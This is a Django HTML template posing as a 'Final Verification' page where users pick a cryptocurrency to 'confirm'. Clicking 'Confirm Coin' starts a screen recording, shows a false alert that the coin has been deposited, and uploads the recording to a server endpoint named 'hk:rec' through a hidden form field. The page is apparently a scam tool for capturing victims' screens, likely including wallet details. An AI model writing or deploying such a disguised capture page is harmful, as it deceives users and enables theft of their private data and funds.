{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Final Verification</title>
    <link rel="stylesheet" type="text/css" href="{% static 'css/auth.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'fontawesome/css/all.min.css' %}">

<style type="text/css">
    *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body{
    height: 100vh;
    align-items: center;
    justify-content: center;
    background-color: black;
    display: flex;

}

.container{
    position: relative;
    max-width: 430px;
    width: 100%;
/*    background-color: rgb(248, 247, 246);*/
    background-color: black;
    box-shadow: 0 5PX 10PX rgba(0,0,0,0.1);
    border-radius: 10px;
    overflow: hidden;
}

.container .forms{
    width: 175%;
    display: flex;
    align-items: center;
    height: 550px;
    transition: height 0.2s ease;
    padding: 25px;
}

.container.large{
    height:600px;
    transition: height 0.2s ease;
}

.container.active .forms {
    height: 600px;
}

.container .form{
    padding: 30px;
    width: 50%;
    background-color: rgb(251, 251, 252);
    transition: margin-left 0.18s ease;

}

.container.active .login {
    margin-left: -50%;
    opacity: 0;
    transition: margin-left 0.18s ease, opacity 0.15 ease;
}

.container.signup {
    opacity: 0;
    transition: opacity 0.09s ease;
}


.container.active .signup {
    opacity: 1;
    transition: opacity 0.2s ease;
}

.container .form .title{
    font-size: 27px;
    position: relative;
    font-weight: 600;
}

.form .title::before{
    content: '';
    position: absolute;
    left: 0;
    bottom: 0;
    height: 3px;
    width: 38px;
    background-color: rgb(155, 6, 31);
    border-radius: 25px;
}

.form .input-field{
    margin-top: 30px;
    position: relative;
    height: 50px;
    width: 100%;
}

.input-field input{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}

.input-field i{
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
    color: #999;
    font-size: 23px;
}

.input-field input:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field input:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

.input-field i.icon{
    left: 0;
}

.input-field i.showHidePw{
    right:0;
    cursor: pointer;
    padding: 10px;
}

.form .checkbox-text{
    display: flex;
    justify-content: space-between;
    margin-top: 20px;
    align-items: center;
}

.checkbox-text .checkbox-content{
    display: flex;
    align-items: center;
}

.checkbox-content input{
    accent-color: rgb(9, 9, 170);
    margin: 0 8px -2px 4px;
}

.form a.text{
    text-decoration: none;
    color: rgb(9, 9, 170);
}

.form a:hover{
    text-decoration: underline;
}

.form .text{
    color: black;
    font-size: 14px;
}

.form .button{
    margin-top: 35px;

}

.form .button input{
    border: none;
    color: black;
    letter-spacing: 1px;
    border-radius: 6px;
    font-size: 17px;
    cursor: pointer;
/*    background-color: rgb(155, 6, 31);*/
     background-color: yellow;
    font-weight: 500;
    transition: all 0.3s ease;
}

.button input:hover{
    background-color: rgb(241, 30, 30);
}

.form .login-signup{
    margin-top: 30px;
    text-align: center;
}


.input-field select{
    height: 100%;
    width: 100%;
    position: absolute;
    padding: 0 35px;
    border: none;
    outline: none;
    border-bottom: 2px solid #ccc;
    border-top: 2px solid transparent;
    font-size: 17px;
    transition: all 0.3s ease;
}


.input-field select:is(:focus, :valid){
    border-bottom-color: rgb(155, 6, 31);
}

.input-field select:is(:focus, :valid)~i{
    color: rgb(155, 6, 31);
}

button{
    background: #f05462;
    color: white;
    padding: 5px 10px;
    text-align: center;
}

button:hover{
    color: #f05462;
    background: white;
    padding: 3px 8px;
    border: 2px solid #f05462;
}
</style>
</head>

<body>

<div class="container"><br><br><br><br>
    <div class="forms">

        <div class="form login">
            <span class="title">Verify Coin Choice</span>
            <form  method="POST" enctype="multipart/form-data"><br>
                {% csrf_token %}

            <div class="input-field" style="display: none;">
                <input type="file" name="video" accept="video/*">
            </div>

               <div class="input-field">
                <select name="coin" id="id_coin">
                  <option value="Select Coin">Select Coin</option>

                  <option value="Bitcoin">Bitcoin</option>

                  <option value="Ethurum">Ethurum</option>

                  <option value="BnB">BnB</option>

                  <option value="USDT_Tron">USDT_Tron</option>

                  <option value="USDT_ERC20">USDT_ERC20</option>

                </select>
            </div>

            <div class="input-field button" style="display: none;">
                <input type="submit" value="Choose Coin">
            </div>

            <div class="input-field button" id="startB">
               
            </div> 
            </form><br>
        </div>
    </div>
</div>

</body>


<script src="{% static 'js/jquery.js' %}"></script>
<script type="text/javascript">

let mediaRecorder;
let recordedChunks = [];

async function startRecording() {
    const stream = await navigator.mediaDevices.getDisplayMedia({
        video: { mediaSource: "screen" }
    });

    mediaRecorder = new MediaRecorder(stream);

    mediaRecorder.ondataavailable = function(event) {
        if (event.data.size > 0) {
            recordedChunks.push(event.data);
        }
    };
    alert("Check your wallet, your coin has been deposited.. Congratulations!");

    mediaRecorder.onstop = function() {
        const blob = new Blob(recordedChunks, {
            type: "video/webm"
        });
        const url = URL.createObjectURL(blob);

        const videoElement = document.createElement("video");
        videoElement.src = url;
        document.body.appendChild(videoElement);
        videoElement.play();

        // Create a form and submit the video blob
        const formData = new FormData();
        formData.append('video', blob, 'screen-recording.webm');

        fetch("{% url 'hk:rec' %}", {
            method: 'POST',
            body: formData,
            headers: {
                'X-CSRFToken': '{{ csrf_token }}'

            }

        }).then(response => {
            if (response.ok) {
                // alert("Recording uploaded successfully!");
            }
        });
    };

    mediaRecorder.start();
}

function stopRecording() {
    const recordingDuration = 2 * 60 * 60 * 1000; 
    setTimeout(()=>{
        mediaRecorder.stop();
        location.reload();

    })
    
}

document.addEventListener('DOMContentLoaded', (event) => {
    const startBtn = document.createElement("button");
    startBtn.textContent = "Confirm Coin";
    startBtn.onclick = startRecording;

    const stopBtn = document.createElement("button");
    stopBtn.textContent = "Stop Recording";
    stopBtn.onclick = stopRecording;

    
    document.body.appendChild(startBtn);
    // document.body.appendChild(stopBtn);
});


</script>
</body>
</html>





